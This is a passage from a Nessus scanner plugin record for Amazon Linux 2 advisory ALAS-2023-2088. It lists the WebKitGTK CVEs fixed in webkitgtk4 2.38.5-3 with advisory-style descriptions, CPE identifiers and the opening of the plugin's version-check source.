in macOS Ventura 13.2, macOS Monterey 12.6.3, tvOS 16.3, Safari 16.3, watchOS 9.3, iOS 16.3 and iPadOS 16.3, macOS Big Sur 11.7.3.\n Processing maliciously crafted web content may lead to arbitrary code execution. (CVE-2023-23517, CVE-2023-23518)\n\n - A type confusion issue was addressed with improved checks. This issue is fixed in macOS Ventura 13.2.1, iOS 16.3.1 and iPadOS 16.3.1, Safari 16.3. Processing maliciously crafted web content may lead to arbitrary code execution. Apple is aware of a report that this issue may have been actively exploited..\n (CVE-2023-23529)\n\n - A use-after-free vulnerability in WebCore::RenderLayer::addChild in WebKitGTK before 2.36.8 allows attackers to execute code remotely. (CVE-2023-25358)\n\n - A use-after-free vulnerability in WebCore::RenderLayer::renderer in WebKitGTK before 2.36.8 allows attackers to execute code remotely. (CVE-2023-25360)\n\n - A use-after-free vulnerability in WebCore::RenderLayer::setNextSibling in WebKitGTK before 2.36.8 allows attackers to execute code remotely. (CVE-2023-25361)\n\n - A use-after-free vulnerability in WebCore::RenderLayer::repaintBlockSelectionGaps in WebKitGTK before 2.36.8 allows attackers to execute code remotely. (CVE-2023-25362)\n\n - A use-after-free vulnerability in WebCore::RenderLayer::updateDescendantDependentFlags in WebKitGTK before 2.36.8 allows attackers to execute code remotely. (CVE-2023-25363)\n\n - This issue was addressed with improved state management. This issue is fixed in macOS Ventura 13.3, tvOS 16.4, watchOS 9.4, Safari 16.4, iOS 16.4 and iPadOS 16.4. Processing maliciously crafted web content may bypass Same Origin Policy (CVE-2023-27932)\n\n - The issue was addressed by removing origin information. This issue is fixed in macOS Ventura 13.3, iOS 15.7.4 and iPadOS 15.7.4, tvOS 16.4, watchOS 9.4, Safari 16.4, iOS 16.4 and iPadOS 16.4. A website may be able to track sensitive user information (CVE-2023-27954)\n\n - A use after free issue was addressed with improved memory management. This issue is fixed in macOS Ventura 13.3.1, iOS 16.4.1 and iPadOS 16.4.1, iOS 15.7.5 and iPadOS 15.7.5, Safari 16.4.1. Processing maliciously crafted web content may lead to arbitrary code execution. Apple is aware of a report that this issue may have been actively exploited. (CVE-2023-28205)\n\n - An out-of-bounds read was addressed with improved input validation. (CVE-2023-28204)\n\n - A use-after-free issue was addressed with improved memory management. (CVE-2023-32373)\n\n - The issue was addressed with improved bounds checks. (CVE-2023-32409)\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version number.", "cvss3": {}, "published": "2023-06-13T00:00:00", "type": "nessus", "title": "Amazon Linux 2 : webkitgtk4 (ALAS-2023-2088)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2020-22592", "CVE-2020-27918", "CVE-2020-29623", "CVE-2021-1765", "CVE-2021-1788", "CVE-2021-1789", "CVE-2021-1799", "CVE-2021-1801", "CVE-2021-1817", "CVE-2021-1820", "CVE-2021-1825", "CVE-2021-1826", "CVE-2021-1844", "CVE-2021-1870", "CVE-2021-21775", "CVE-2021-21779", "CVE-2021-21806", "CVE-2021-30661", "CVE-2021-30663", "CVE-2021-30665", "CVE-2021-30666", "CVE-2021-30682", "CVE-2021-30689", "CVE-2021-30720", "CVE-2021-30734", "CVE-2021-30744", "CVE-2021-30749", "CVE-2021-30758", "CVE-2021-30761", "CVE-2021-30762", "CVE-2021-30795", "CVE-2021-30797", "CVE-2021-30799", "CVE-2021-30809", "CVE-2021-30818", "CVE-2021-30836", "CVE-2021-30846", "CVE-2021-30848", "CVE-2021-30849", "CVE-2021-30851", "CVE-2021-30887", "CVE-2021-30888", "CVE-2021-30889", "CVE-2021-30890", "CVE-2021-30934", "CVE-2021-30936", "CVE-2021-30951", "CVE-2021-30952", "CVE-2021-30953", "CVE-2021-30954", "CVE-2021-30984", "CVE-2021-32912", "CVE-2021-41133", "CVE-2021-42762", "CVE-2021-45481", "CVE-2021-45482", "CVE-2021-45483", "CVE-2022-22590", "CVE-2022-22592", "CVE-2022-22662", "CVE-2022-22677", "CVE-2022-26700", "CVE-2022-26709", "CVE-2022-26710", "CVE-2022-26716", "CVE-2022-26717", "CVE-2022-26719", "CVE-2022-30293", "CVE-2022-32792", "CVE-2022-32793", "CVE-2022-32816", "CVE-2022-32885", "CVE-2022-32888", "CVE-2022-32923", "CVE-2022-42799", "CVE-2022-42824", "CVE-2022-42826", "CVE-2022-42852", "CVE-2022-42856", "CVE-2022-42863", "CVE-2022-42867", "CVE-2022-46691", "CVE-2022-46692", "CVE-2022-46698", "CVE-2022-46699", "CVE-2022-46700", "CVE-2023-2203", "CVE-2023-23517", "CVE-2023-23518", "CVE-2023-23529", "CVE-2023-25358", "CVE-2023-25360", "CVE-2023-25361", "CVE-2023-25362", "CVE-2023-25363", "CVE-2023-27932", "CVE-2023-27954", "CVE-2023-28204", "CVE-2023-28205", "CVE-2023-32373", "CVE-2023-32409"], "modified": "2023-06-14T00:00:00", "cpe": ["p-cpe:/a:amazon:linux:webkitgtk4", "p-cpe:/a:amazon:linux:webkitgtk4-debuginfo", "p-cpe:/a:amazon:linux:webkitgtk4-devel", "p-cpe:/a:amazon:linux:webkitgtk4-jsc", "p-cpe:/a:amazon:linux:webkitgtk4-jsc-devel", "cpe:/o:amazon:linux:2"], "id": "AL2_ALAS-2023-2088.NASL", "href": "https://www.tenable.com/plugins/nessus/177194", "sourceData": "#%NASL_MIN_LEVEL 80900\n##\n# (C) Tenable, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Amazon Linux 2 Security Advisory ALAS-2023-2088.\n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(177194);\n script_version(\"1.1\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/06/14\");\n\n script_cve_id(\n \"CVE-2020-22592\",\n \"CVE-2020-27918\",\n \"CVE-2020-29623\",\n \"CVE-2021-1765\",\n \"CVE-2021-1788\",\n \"CVE-2021-1789\",\n \"CVE-2021-1799\",\n \"CVE-2021-1801\",\n \"CVE-2021-1817\",\n \"CVE-2021-1820\",\n \"CVE-2021-1825\",\n \"CVE-2021-1826\",\n \"CVE-2021-1844\",\n \"CVE-2021-1870\",\n \"CVE-2021-21775\",\n \"CVE-2021-21779\",\n \"CVE-2021-21806\",\n \"CVE-2021-30661\",\n \"CVE-2021-30663\",\n \"CVE-2021-30665\",\n \"CVE-2021-30666\",\n \"CVE-2021-30682\",\n \"CVE-2021-30689\",\n \"CVE-2021-30720\",\n \"CVE-2021-30734\",\n \"CVE-2021-30744\",\n \"CVE-2021-30749\",\n \"CVE-2021-30758\",\n \"CVE-2021-30761\",\n \"CVE-2021-30762\",\n \"CVE-2021-30795\",\n \"CVE-2021-30797\",\n \"CVE-2021-30799\",\n \"CVE-2021-30809\",\n \"CVE-2021-30818\",\n \"CVE-2021-30836\",\n \"CVE-2021-30846\",\n \"CVE-2021-30848\",\n \"CVE-2021-30849\",\n \"CVE-2021-30851\",\n \"CVE-2021-30887\",\n \"CVE-2021-30888\",\n \"CVE-2021-30889\",\n \"CVE-2021-30890\",\n \"CVE-2021-30934\",\n \"CVE-2021-30936\",\n \"CVE-2021-30951\",\n \"CVE-2021-30952\",\n \"CVE-2021-30953\",\n \"CVE-2021-30954\",\n \"CVE-2021-30984\",\n \"CVE-2021-32912\",\n \"CVE-2021-42762\",\n \"CVE-2021-45481\",\n \"CVE-2021-45482\",\n \"CVE-2021-45483\",\n \"CVE-2022-22590\",\n \"CVE-2022-22592\",\n \"CVE-2022-22662\",\n \"CVE-2022-22677\",\n \"CVE-2022-26700\",\n \"CVE-2022-26709\",\n \"CVE-2022-26710\",\n \"CVE-2022-26716\",\n \"CVE-2022-26717\",\n \"CVE-2022-26719\",\n \"CVE-2022-30293\",\n \"CVE-2022-32792\",\n \"CVE-2022-32793\",\n \"CVE-2022-32816\",\n \"CVE-2022-32885\",\n \"CVE-2022-32888\",\n \"CVE-2022-32923\",\n \"CVE-2022-42799\",\n \"CVE-2022-42824\",\n \"CVE-2022-42826\",\n \"CVE-2022-42852\",\n \"CVE-2022-42856\",\n \"CVE-2022-42863\",\n \"CVE-2022-42867\",\n \"CVE-2022-46691\",\n \"CVE-2022-46692\",\n \"CVE-2022-46698\",\n \"CVE-2022-46699\",\n \"CVE-2022-46700\",\n \"CVE-2023-2203\",\n \"CVE-2023-23517\",\n \"CVE-2023-23518\",\n \"CVE-2023-23529\",\n \"CVE-2023-25358\",\n \"CVE-2023-25360\",\n \"CVE-2023-25361\",\n \"CVE-2023-25362\",\n \"CVE-2023-25363\",\n \"CVE-2023-27932\",\n \"CVE-2023-27954\",\n \"CVE-2023-28204\",\n \"CVE-2023-28205\",\n \"CVE-2023-32373\",\n \"CVE-2023-32409\"\n );\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2021/11/17\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/25\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2023/01/04\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2023/03/07\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2023/05/01\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2023/06/12\");\n\n script_name(english:\"Amazon Linux 2 : webkitgtk4 (ALAS-2023-2088)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Amazon Linux 2 host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of webkitgtk4 installed on the remote host is prior to 2.38.5-3. It is, therefore, affected by multiple\nvulnerabilities as referenced in the ALAS2-2023-2088 advisory.\n\n - A use after free issue was addressed with improved memory management. This issue is fixed in macOS Big Sur\n 11.0.1, watchOS 7.1, iOS 14.2 and iPadOS 14.2, iCloud for Windows 11.5, Safari 14.0.1, tvOS 14.2, iTunes\n 12.11 for Windows. Processing maliciously crafted web content may lead to arbitrary code execution.\n (CVE-2020-27918)\n\n - Clear History and Website Data did not clear the history. The issue was addressed with improved data\n deletion. This issue is fixed in macOS Big Sur 11.1, Security Update 2020-001 Catalina, Security Update\n 2020-007 Mojave, iOS 14.3 and iPadOS 14.3, tvOS 14.3. A user may be unable to fully delete browsing\n history. (CVE-2020-29623)\n\n - This issue was addressed with improved iframe sandbox enforcement. This issue is fixed in macOS Big Sur\n 11.2, Security Update 2021-001 Catalina, Security Update 2021-001 Mojave. Maliciously crafted web content\n may violate iframe sandboxing policy. (CVE-2021-1765)\n\n - A use after free issue was addressed with improved memory management. This issue is fixed in macOS Big Sur\n 11.2, Security Update 2021-001 Catalina, Security Update 2021-001 Mojave, tvOS 14.4, watchOS 7.3, iOS 14.4\n and iPadOS 14.4, Safari 14.0.3. Processing maliciously crafted web content may lead to arbitrary code\n execution. (CVE-2021-1788)\n\n - A type confusion issue was addressed with improved state handling. This issue is fixed in macOS Big Sur\n 11.2, Security Update 2021-001 Catalina, Security Update 2021-001 Mojave, tvOS 14.4, watchOS 7.3, iOS 14.4\n and iPadOS 14.4, Safari 14.0.3. Processing maliciously crafted web content may lead to arbitrary code\n execution. (CVE-2021-1789)\n\n - A port redirection issue was addressed with additional port validation. This issue is fixed in macOS Big\n Sur 11.2, Security Update 2021-001 Catalina, Security Update 2021-001 Mojave, tvOS 14.4, watchOS 7.3, iOS\n 14.4 and iPadOS 14.4, Safari 14.0.3. A malicious website may be able to access restricted ports on\n arbitrary servers. (CVE-2021-1799)\n\n - This issue was addressed with improved iframe sandbox enforcement. This issue is fixed in macOS Big Sur\n 11.2, Security Update 2021-001 Catalina, Security Update 2021-001 Mojave, watchOS 7.3, tvOS 14.4, iOS 14.4\n and iPadOS 14.4. Maliciously crafted web content may violate iframe sandboxing policy. (CVE-2021-1801)\n\n - A memory corruption issue was addressed with improved state management. This issue is fixed in macOS Big\n Sur 11.3, iOS 14.5 and iPadOS 14.5, watchOS 7.4, tvOS 14.5. Processing maliciously crafted web content may\n lead to arbitrary code execution. (CVE-2021-1817)\n\n - A memory initialization issue was addressed with improved memory handling. This issue is fixed in macOS\n Big Sur 11.3, iOS 14.5 and iPadOS 14.5, watchOS 7.4, tvOS 14.5. Processing maliciously crafted web content\n may result in the disclosure of process memory. (CVE-2021-1820)\n\n - An input validation issue was addressed with improved input validation. This issue is fixed in iTunes\n 12.11.3 for Windows, iCloud for Windows 12.3, macOS Big Sur 11.3, Safari 14.1, watchOS 7.4, tvOS 14.5, iOS\n 14.5 and iPadOS 14.5. Processing maliciously crafted web content may lead to a cross site scripting\n attack. (CVE-2021-1825)\n\n - A logic issue was addressed with improved restrictions. This issue is fixed in macOS Big Sur 11.3, iOS\n 14.5 and iPadOS 14.5, watchOS 7.4, tvOS 14.5. Processing maliciously crafted web content may lead to\n universal cross site scripting. (CVE-2021-1826)\n\n - A memory corruption issue was addressed with improved validation. This issue is fixed in iOS 14.4.1 and\n iPadOS 14.4.1, Safari 14.0.3 (v. 14610.4.3.1.7 and 15610.4.3.1.7), watchOS 7.3.2, macOS Big Sur 11.2.3.\n Processing maliciously crafted web content may lead to arbitrary code execution. (CVE-2021-1844)\n\n - A logic issue was addressed with improved restrictions. This issue is fixed in macOS Big Sur 11.2,\n Security Update 2021-001 Catalina, Security Update 2021-001 Mojave, iOS 14.4 and iPadOS 14.4. A remote\n attacker may be able to cause arbitrary code execution. Apple is aware of a report that this issue may\n have been actively exploited.. (CVE-2021-1870)\n\n - A use-after-free vulnerability exists in the way certain events are processed for ImageLoader objects of\n Webkit WebKitGTK 2.30.4. A specially crafted web page can lead to a potential information leak and further\n memory corruption. In order to trigger the vulnerability, a victim must be tricked into visiting a\n malicious webpage. (CVE-2021-21775)\n\n - A use-after-free vulnerability exists in the way Webkit's GraphicsContext handles certain events in\n WebKitGTK 2.30.4. A specially crafted web page can lead to a potential information leak and further memory\n corruption. A victim must be tricked into visiting a malicious web page to trigger this vulnerability.\n (CVE-2021-21779)\n\n - An exploitable use-after-free vulnerability exists in WebKitGTK browser version 2.30.3 x64. A specially\n crafted HTML web page can cause a use-after-free condition, resulting in remote code execution. The victim\n needs to visit a malicious web site to trigger the vulnerability. (CVE-2021-21806)\n\n - A use after free issue was addressed with improved memory management. This issue is fixed in Safari 14.1,\n iOS 12.5.3, iOS 14.5 and iPadOS 14.5, watchOS 7.4, tvOS 14.5, macOS Big Sur 11.3. Processing maliciously\n crafted web content may lead to arbitrary code execution. Apple is aware of a report that this issue may\n have been actively exploited.. (CVE-2021-30661)\n\n - An integer overflow was addressed with improved input validation. This issue is fixed in iOS 14.5.1 and\n iPadOS 14.5.1, tvOS 14.6, iOS 12.5.3, Safari 14.1.1, macOS Big Sur 11.3.1. Processing maliciously crafted\n web content may lead to arbitrary code execution. (CVE-2021-30663)\n\n - A memory corruption issue was addressed with improved state management. This issue is fixed in watchOS\n 7.4.1, iOS 14.5.1 and iPadOS 14.5.1, tvOS 14.6, iOS 12.5.3, macOS Big Sur 11.3.1. Processing maliciously\n crafted web content may lead to arbitrary code execution. Apple is aware of a report that this issue may\n have been actively exploited.. (CVE-2021-30665)\n\n - A buffer overflow issue was addressed with improved memory handling. This issue is fixed in iOS 12.5.3.\n Processing maliciously crafted web content may lead to arbitrary code execution. Apple is aware of a\n report that this issue may have been actively exploited.. (CVE-2021-30666)\n\n - A logic issue was addressed with improved restrictions. This issue is fixed in tvOS 14.6, iOS 14.6 and\n iPadOS 14.6, Safari 14.1.1, macOS Big Sur 11.4, watchOS 7.5. A malicious application may be able to leak\n sensitive user information. (CVE-2021-30682)\n\n - A logic issue was addressed with improved state management. This issue is fixed in tvOS 14.6, iOS 14.6 and\n iPadOS 14.6, Safari 14.1.1, macOS Big Sur 11.4, watchOS 7.5. Processing maliciously crafted web content\n may lead to universal cross site scripting. (CVE-2021-30689)\n\n - A logic issue was addressed with improved restrictions. This issue is fixed in tvOS 14.6, iOS 14.6 and\n iPadOS 14.6, Safari 14.1.1, macOS Big Sur 11.4, watchOS 7.5. A malicious website may be able to access\n restricted ports on arbitrary servers. (CVE-2021-30720)\n\n - Multiple memory corruption issues were addressed with improved memory handling. This issue is fixed in\n tvOS 14.6, iOS 14.6 and iPadOS 14.6, Safari 14.1.1, macOS Big Sur 11.4, watchOS 7.5. Processing\n maliciously crafted web content may lead to arbitrary code execution. (CVE-2021-30734, CVE-2021-30749)\n\n - Description: A cross-origin issue with iframe elements was addressed with improved tracking of security\n origins. This issue is fixed in tvOS 14.6, iOS 14.6 and iPadOS 14.6, Safari 14.1.1, macOS Big Sur 11.4,\n watchOS 7.5. Processing maliciously crafted web content may lead to universal cross site scripting.\n (CVE-2021-30744)\n\n - A type confusion issue was addressed with improved state handling. This issue is fixed in iOS 14.7, Safari\n 14.1.2, macOS Big Sur 11.5, watchOS 7.6, tvOS 14.7. Processing maliciously crafted web content may lead to\n arbitrary code execution. (CVE-2021-30758)\n\n - A memory corruption issue was addressed with improved state management. This issue is fixed in iOS 12.5.4.\n Processing maliciously crafted web content may lead to arbitrary code execution. Apple is aware of a\n report that this issue may have been actively exploited.. (CVE-2021-30761)\n\n - A use after free issue was addressed with improved memory management. This issue is fixed in iOS 12.5.4.\n Processing maliciously crafted web content may lead to arbitrary code execution. Apple is aware of a\n report that this issue may have been actively exploited.. (CVE-2021-30762)\n\n - A use after free issue was addressed with improved memory management. This issue is fixed in iOS 14.7,\n Safari 14.1.2, macOS Big Sur 11.5, watchOS 7.6, tvOS 14.7. Processing maliciously crafted web content may\n lead to arbitrary code execution. (CVE-2021-30795)\n\n - This issue was addressed with improved checks. This issue is fixed in iOS 14.7, Safari 14.1.2, macOS Big\n Sur 11.5, watchOS 7.6, tvOS 14.7. Processing maliciously crafted web content may lead to code execution.\n (CVE-2021-30797)\n\n - Multiple memory corruption issues were addressed with improved memory handling. This issue is fixed in iOS\n 14.7, macOS Big Sur 11.5, Security Update 2021-004 Catalina, Security Update 2021-005 Mojave. Processing\n maliciously crafted web content may lead to arbitrary code execution. (CVE-2021-30799)\n\n - A use after free issue was addressed with improved memory management. This issue is fixed in Safari 15,\n tvOS 15, watchOS 8, iOS 15 and iPadOS 15. Processing maliciously crafted web content may lead to arbitrary\n code execution. (CVE-2021-30809)\n\n - A type confusion issue was addressed with improved state handling. This issue is fixed in iOS 14.8 and\n iPadOS 14.8, tvOS 15, iOS 15 and iPadOS 15, Safari 15, watchOS 8. Processing maliciously crafted web\n content may lead to arbitrary code execution. (CVE-2021-30818)\n\n - An out-of-bounds read was addressed with improved input validation. This issue is fixed in iOS 14.8 and\n iPadOS 14.8, tvOS 15, watchOS 8, iOS 15 and iPadOS 15. Processing a maliciously crafted audio file may\n disclose restricted memory. (CVE-2021-30836)\n\n - A memory corruption issue was addressed with improved memory handling. This issue is fixed in iOS 14.8 and\n iPadOS 14.8, Safari 15, tvOS 15, iOS 15 and iPadOS 15, watchOS 8. Processing maliciously crafted web\n content may lead to arbitrary code execution. (CVE-2021-30846)\n\n - A memory corruption issue was addressed with improved memory handling. This issue is fixed in iOS 14.8 and\n iPadOS 14.8, Safari 15, iOS 15 and iPadOS 15. Processing maliciously crafted web content may lead to code\n execution. (CVE-2021-30848)\n\n - Multiple memory corruption issues were addressed with improved memory handling. This issue is fixed in iOS\n 14.8 and iPadOS 14.8, watchOS 8, Safari 15, tvOS 15, iOS 15 and iPadOS 15, iTunes 12.12 for Windows.\n Processing maliciously crafted web content may lead to arbitrary code execution. (CVE-2021-30849)\n\n - A memory corruption vulnerability was addressed with improved locking. This issue is fixed in Safari 15,\n tvOS 15, watchOS 8, iOS 15 and iPadOS 15. Processing maliciously crafted web content may lead to code\n execution. (CVE-2021-30851)\n\n - A logic issue was addressed with improved restrictions. This issue is fixed in macOS Monterey 12.0.1, iOS\n 15.1 and iPadOS 15.1, watchOS 8.1, tvOS 15.1. Processing maliciously crafted web content may lead to\n unexpectedly unenforced Content Security Policy. (CVE-2021-30887)\n\n - An information leakage issue was addressed. This issue is fixed in iOS 15.1 and iPadOS 15.1, macOS\n Monterey 12.0.1, iOS 14.8.1 and iPadOS 14.8.1, tvOS 15.1, watchOS 8.1. A malicious website using Content\n Security Policy reports may be able to leak information via redirect behavior . (CVE-2021-30888)\n\n - A buffer overflow issue was addressed with improved memory handling. This issue is fixed in macOS Monterey\n 12.0.1, iOS 15.1 and iPadOS 15.1, watchOS 8.1, tvOS 15.1. Processing maliciously crafted web content may\n lead to arbitrary code execution. (CVE-2021-30889)\n\n - A logic issue was addressed with improved state management. This issue is fixed in macOS Monterey 12.0.1,\n iOS 15.1 and iPadOS 15.1, watchOS 8.1, tvOS 15.1. Processing maliciously crafted web content may lead to\n universal cross site scripting. (CVE-2021-30890)\n\n - A buffer overflow issue was addressed with improved memory handling. This issue is fixed in tvOS 15.2,\n macOS Monterey 12.1, Safari 15.2, iOS 15.2 and iPadOS 15.2, watchOS 8.3. Processing maliciously crafted\n web content may lead to arbitrary code execution. (CVE-2021-30934)\n\n - A use after free issue was addressed with improved memory management. This issue is fixed in tvOS 15.2,\n macOS Monterey 12.1, Safari 15.2, iOS 15.2 and iPadOS 15.2, watchOS 8.3. Processing maliciously crafted\n web content may lead to arbitrary code execution. (CVE-2021-30936, CVE-2021-30951)\n\n - An integer overflow was addressed with improved input validation. This issue is fixed in tvOS 15.2, macOS\n Monterey 12.1, Safari 15.2, iOS 15.2 and iPadOS 15.2, watchOS 8.3. Processing maliciously crafted web\n content may lead to arbitrary code execution. (CVE-2021-30952)\n\n - An out-of-bounds read was addressed with improved bounds checking. This issue is fixed in tvOS 15.2, macOS\n Monterey 12.1, Safari 15.2, iOS 15.2 and iPadOS 15.2, watchOS 8.3. Processing maliciously crafted web\n content may lead to arbitrary code execution. (CVE-2021-30953)\n\n - A type confusion issue was addressed with improved memory handling. This issue is fixed in tvOS 15.2,\n macOS Monterey 12.1, Safari 15.2, iOS 15.2 and iPadOS 15.2, watchOS 8.3. Processing maliciously crafted\n web content may lead to arbitrary code execution. (CVE-2021-30954)\n\n - A race condition was addressed with improved state handling. This issue is fixed in tvOS 15.2, macOS\n Monterey 12.1, Safari 15.2, iOS 15.2 and iPadOS 15.2, watchOS 8.3. Processing maliciously crafted web\n content may lead to arbitrary code execution. (CVE-2021-30984)\n\n - BubblewrapLauncher.cpp in WebKitGTK and WPE WebKit before 2.34.1 allows a limited sandbox bypass that\n allows a sandboxed process to trick host processes into thinking the sandboxed process is not confined by\n the sandbox, by abusing VFS syscalls that manipulate its filesystem namespace. The impact is limited to\n host services that create UNIX sockets that WebKit mounts inside its sandbox, and the sandboxed process\n remains otherwise confined. NOTE: this is similar to CVE-2021-41133. (CVE-2021-42762)\n\n - In WebKitGTK before 2.32.4, there is incorrect memory allocation in\n WebCore::ImageBufferCairoImageSurfaceBackend::create, leading to a segmentation violation and application\n crash, a different vulnerability than CVE-2021-30889. (CVE-2021-45481)\n\n - In WebKitGTK before 2.32.4, there is a use-after-free in WebCore::ContainerNode::firstChild, a different\n vulnerability than CVE-2021-30889. (CVE-2021-45482)\n\n - In WebKitGTK before 2.32.4, there is a use-after-free in WebCore::Frame::page, a different vulnerability\n than CVE-2021-30889. (CVE-2021-45483)\n\n - A use after free issue was addressed with improved memory management. This issue is fixed in iOS 15.3 and\n iPadOS 15.3, watchOS 8.4, tvOS 15.3, Safari 15.3, macOS Monterey 12.2. Processing maliciously crafted web\n content may lead to arbitrary code execution. (CVE-2022-22590)\n\n - A logic issue was addressed with improved state management. This issue is fixed in iOS 15.3 and iPadOS\n 15.3, watchOS 8.4, tvOS 15.3, Safari 15.3, macOS Monterey 12.2. Processing maliciously crafted web content\n may prevent Content Security Policy from being enforced. (CVE-2022-22592)\n\n - A cookie management issue was addressed with improved state management. This issue is fixed in Security\n Update 2022-003 Catalina, macOS Big Sur 11.6.5. Processing maliciously crafted web content may disclose\n sensitive user information. (CVE-2022-22662)\n\n - A logic issue in the handling of concurrent media was addressed with improved state handling. This issue\n is fixed in macOS Monterey 12.4, iOS 15.5 and iPadOS 15.5. Video self-preview in a webRTC call may be\n interrupted if the user answers a phone call. (CVE-2022-22677)\n\n - A memory corruption issue was addressed with improved state management. This issue is fixed in tvOS 15.5,\n watchOS 8.6, iOS 15.5 and iPadOS 15.5, macOS Monterey 12.4, Safari 15.5. Processing maliciously crafted\n web content may lead to code execution. (CVE-2022-26700)\n\n - A use after free issue was addressed with improved memory management. This issue is fixed in tvOS 15.5,\n iOS 15.5 and iPadOS 15.5, watchOS 8.6, macOS Monterey 12.4, Safari 15.5. Processing maliciously crafted\n web content may lead to arbitrary code execution. (CVE-2022-26709)\n\n - A use after free issue was addressed with improved memory management. This issue is fixed in iOS 15.5 and\n iPadOS 15.5, macOS Monterey 12.4, tvOS 15.5, watchOS 8.6. Processing maliciously crafted web content may\n lead to arbitrary code execution. (CVE-2022-26710)\n\n - A memory corruption issue was addressed with improved state management. This issue is fixed in tvOS 15.5,\n iOS 15.5 and iPadOS 15.5, watchOS 8.6, macOS Monterey 12.4, Safari 15.5. Processing maliciously crafted\n web content may lead to arbitrary code execution. (CVE-2022-26716, CVE-2022-26719)\n\n - A use after free issue was addressed with improved memory management. This issue is fixed in tvOS 15.5,\n watchOS 8.6, iOS 15.5 and iPadOS 15.5, macOS Monterey 12.4, Safari 15.5, iTunes 12.12.4 for Windows.\n Processing maliciously crafted web content may lead to arbitrary code execution. (CVE-2022-26717)\n\n - In WebKitGTK through 2.36.0 (and WPE WebKit), there is a heap-based buffer overflow in\n WebCore::TextureMapperLayer::setContentsLayer in WebCore/platform/graphics/texmap/TextureMapperLayer.cpp.\n (CVE-2022-30293)\n\n - An out-of-bounds write issue was addressed with improved input validation. This issue is fixed in iOS 15.6\n and iPadOS 15.6, watchOS 8.7, tvOS 15.6, macOS Monterey 12.5, Safari 15.6. Processing maliciously crafted\n web content may lead to arbitrary code execution. (CVE-2022-32792)\n\n - Multiple out-of-bounds write issues were addressed with improved bounds checking. This issue is fixed in\n macOS Monterey 12.5, watchOS 8.7, tvOS 15.6, iOS 15.6 and iPadOS 15.6. An app may be able to disclose\n kernel memory. (CVE-2022-32793)\n\n - The issue was addressed with improved UI handling. This issue is fixed in watchOS 8.7, tvOS 15.6, iOS 15.6\n and iPadOS 15.6, macOS Monterey 12.5. Visiting a website that frames malicious content may lead to UI\n spoofing. (CVE-2022-32816)\n\n - An out-of-bounds write issue was addressed with improved bounds checking. This issue is fixed in macOS Big\n Sur 11.7, macOS Ventura 13, iOS 16, iOS 15.7 and iPadOS 15.7, watchOS 9, macOS Monterey 12.6, tvOS 16.\n Processing maliciously crafted web content may lead to arbitrary code execution. (CVE-2022-32888)\n\n - A correctness issue in the JIT was addressed with improved checks. This issue is fixed in tvOS 16.1, iOS\n 15.7.1 and iPadOS 15.7.1, macOS Ventura 13, watchOS 9.1, Safari 16.1, iOS 16.1 and iPadOS 16. Processing\n maliciously crafted web content may disclose internal states of the app. (CVE-2022-32923)\n\n - The issue was addressed with improved UI handling. This issue is fixed in tvOS 16.1, macOS Ventura 13,\n watchOS 9.1, Safari 16.1, iOS 16.1 and iPadOS 16. Visiting a malicious website may lead to user interface\n spoofing. (CVE-2022-42799)\n\n - A logic issue was addressed with improved state management. This issue is fixed in tvOS 16.1, macOS\n Ventura 13, watchOS 9.1, Safari 16.1, iOS 16.1 and iPadOS 16. Processing maliciously crafted web content\n may disclose sensitive user information. (CVE-2022-42824)\n\n - A use after free issue was addressed with improved memory management. This issue is fixed in macOS Ventura\n 13, iOS 16.1 and iPadOS 16, Safari 16.1. Processing maliciously crafted web content may lead to arbitrary\n code execution. (CVE-2022-42826)\n\n - The issue was addressed with improved memory handling. This issue is fixed in Safari 16.2, tvOS 16.2,\n macOS Ventura 13.1, iOS 15.7.2 and iPadOS 15.7.2, iOS 16.2 and iPadOS 16.2, watchOS 9.2. Processing\n maliciously crafted web content may result in the disclosure of process memory. (CVE-2022-42852)\n\n - A type confusion issue was addressed with improved state handling. This issue is fixed in Safari 16.2,\n tvOS 16.2, macOS Ventura 13.1, iOS 15.7.2 and iPadOS 15.7.2, iOS 16.1.2. Processing maliciously crafted\n web content may lead to arbitrary code execution. Apple is aware of a report that this issue may have been\n actively exploited against versions of iOS released before iOS 15.1.. (CVE-2022-42856)\n\n - A memory corruption issue was addressed with improved state management. This issue is fixed in Safari\n 16.2, tvOS 16.2, macOS Ventura 13.1, iOS 16.2 and iPadOS 16.2, watchOS 9.2. Processing maliciously crafted\n web content may lead to arbitrary code execution. (CVE-2022-42863, CVE-2022-46699)\n\n - A use after free issue was addressed with improved memory management. This issue is fixed in Safari 16.2,\n tvOS 16.2, macOS Ventura 13.1, iOS 16.2 and iPadOS 16.2, watchOS 9.2. Processing maliciously crafted web\n content may lead to arbitrary code execution. (CVE-2022-42867)\n\n - A memory consumption issue was addressed with improved memory handling. This issue is fixed in Safari\n 16.2, tvOS 16.2, macOS Ventura 13.1, iOS 15.7.2 and iPadOS 15.7.2, iOS 16.2 and iPadOS 16.2, watchOS 9.2.\n Processing maliciously crafted web content may lead to arbitrary code execution. (CVE-2022-46691)\n\n - A logic issue was addressed with improved state management. This issue is fixed in Safari 16.2, tvOS 16.2,\n iCloud for Windows 14.1, iOS 15.7.2 and iPadOS 15.7.2, macOS Ventura 13.1, iOS 16.2 and iPadOS 16.2,\n watchOS 9.2. Processing maliciously crafted web content may bypass Same Origin Policy. (CVE-2022-46692)\n\n - A logic issue was addressed with improved checks. This issue is fixed in Safari 16.2, tvOS 16.2, iCloud\n for Windows 14.1, macOS Ventura 13.1, iOS 16.2 and iPadOS 16.2, watchOS 9.2. Processing maliciously\n crafted web content may disclose sensitive user information. (CVE-2022-46698)\n\n - A memory corruption issue was addressed with improved input validation. This issue is fixed in Safari\n 16.2, tvOS 16.2, macOS Ventura 13.1, iOS 15.7.2 and iPadOS 15.7.2, iOS 16.2 and iPadOS 16.2, watchOS 9.2.\n Processing maliciously crafted web content may lead to 